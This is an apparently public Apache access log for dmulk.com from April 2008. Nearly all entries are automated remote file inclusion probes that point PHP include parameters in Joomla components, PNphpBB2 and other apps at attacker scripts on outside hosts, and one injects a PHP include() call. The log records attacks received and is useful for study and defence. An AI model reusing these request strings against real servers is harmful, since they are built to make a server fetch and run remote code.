209.85.52.146 - - [08/Apr/2008:11:31:57 -0700] "GET /config.php?path_to_root=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:11:33:13 -0700] "GET /logs/access.log//trans/trans.php?trans=eng&page=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:11:33:14 -0700] "GET //trans/trans.php?trans=eng&page=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.214.214 - - [08/Apr/2008:11:33:14 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://www.scadi.cl/.setan/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:33:36 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:33:36 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:33:46 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:33:50 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.30.214.233 - - [08/Apr/2008:11:35:39 -0700] "GET /logs/access_080118.log HTTP/1.0" 200 561818 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.71.36.82 - - [08/Apr/2008:11:35:41 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:11:36:01 -0700] "GET /logs/access_080216.log//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.71.36.82 - - [08/Apr/2008:11:36:10 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:37:01 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:37:01 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:37:14 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:37:14 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.22.162.60 - - [08/Apr/2008:11:38:02 -0700] "GET /logs/access_080131.log//components/com_simpleboard/image_upload.php?sbp=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:11:38:40 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:39:04 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:39:05 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:39:05 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.28.205.136 - - [08/Apr/2008:11:39:10 -0700] "GET /logs/access_080226.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://northamptonsoccer.com/site/language/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.28.205.136 - - [08/Apr/2008:11:39:10 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://northamptonsoccer.com/site/language/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.28.205.136 - - [08/Apr/2008:11:39:10 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://northamptonsoccer.com/site/language/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:39:11 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:39:11 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:39:11 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.28.205.136 - - [08/Apr/2008:11:40:07 -0700] "GET /logs/access_080207.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://northamptonsoccer.com/site/language/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:40:37 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:40:37 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:40:42 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [08/Apr/2008:11:40:47 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.koreandentists.org/bbs//data1/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:11:41:32 -0700] "GET /logs/access_071227.log/modules/My_eGallery/index.php?basepath=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:11:41:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:11:41:32 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.216.106 - - [08/Apr/2008:11:41:34 -0700] "GET /logs/access_080313.log HTTP/1.0" 200 491234 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.71.36.82 - - [08/Apr/2008:11:41:37 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.7.82 - - [08/Apr/2008:11:41:52 -0700] "GET //citywriter/head.php?path=http://h1.ripway.com/h4dy/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.19.109 - - [08/Apr/2008:11:42:11 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
88.191.19.109 - - [08/Apr/2008:11:42:11 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
70.255.172.159 - - [08/Apr/2008:11:42:18 -0700] "GET /logsaccess.log HTTP/1.0" 404 275 "-" "Wget/1.5.3.1" "dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:42:54 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:42:55 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.249.67.148 - - [08/Apr/2008:11:43:19 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.148 - - [08/Apr/2008:11:43:19 -0700] "GET /logs/access_071119.log HTTP/1.1" 200 21994 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:43:21 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:43:21 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:43:21 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.97 - - [08/Apr/2008:11:43:26 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:43:32 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:43:32 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:43:32 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:44:16 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:44:17 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:44:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:44:34 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:44:51 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.195.77.225 - - [08/Apr/2008:11:45:29 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
69.216.175.53 - - [08/Apr/2008:11:46:20 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:46:52 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:11:47:19 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:11:47:49 -0700] "GET /logs/access_071202.log/comments-display-tpl.php?language_file=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:11:47:49 -0700] "GET /logs/comments-display-tpl.php?language_file=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.29 - - [08/Apr/2008:11:47:58 -0700] "GET /retreat1/?S=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:11:48:11 -0700] "GET /logs/access_080306.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:48:11 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:48:11 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:48:12 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:11:48:13 -0700] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:11:48:13 -0700] "GET /logs//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:11:48:14 -0700] "GET /logs/access_071216.log/comments-display-tpl.php?language_file=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:11:48:36 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://kingsofwarcraft.com/info? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:11:48:38 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://kingsofwarcraft.com/info? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.220.115 - - [08/Apr/2008:11:48:42 -0700] "GET /index.php?option=com_custompages&cpage=http://kerjain.net/c? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.154.47 - - [08/Apr/2008:11:49:22 -0700] "GET /index.php?option=com_custompages&cpage=http://www.kingwild.com/c? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:50:16 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:50:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:50:16 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:50:17 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:11:50:33 -0700] "GET /logs/access_080225.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.154.47 - - [08/Apr/2008:11:51:08 -0700] "GET /index.php?option=com_custompages&cpage=http://kerjain.net/c? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:11:51:35 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:11:51:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:11:51:36 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:51:44 -0700] "GET /logs/access.log//main.php?sayfa=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:51:44 -0700] "GET //main.php?sayfa=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:51:45 -0700] "GET /logs//main.php?sayfa=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:11:52:04 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:11:52:10 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:11:52:12 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:53:25 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:53:25 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.157.92.202 - - [08/Apr/2008:11:53:51 -0700] "GET /logs/access_080313.loghttp://myluckypotparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; .NET CLR 1.1.4322)" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:11:53:58 -0700] "GET /logs/access_080313.log//main.php?sayfa=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:11:54:27 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:54:45 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:54:48 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.195.77.225 - - [08/Apr/2008:11:55:03 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [08/Apr/2008:11:55:19 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [08/Apr/2008:11:55:20 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:11:55:22 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:11:55:23 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:11:55:23 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:11:55:23 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:55:45 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:55:46 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:55:50 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:55:50 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
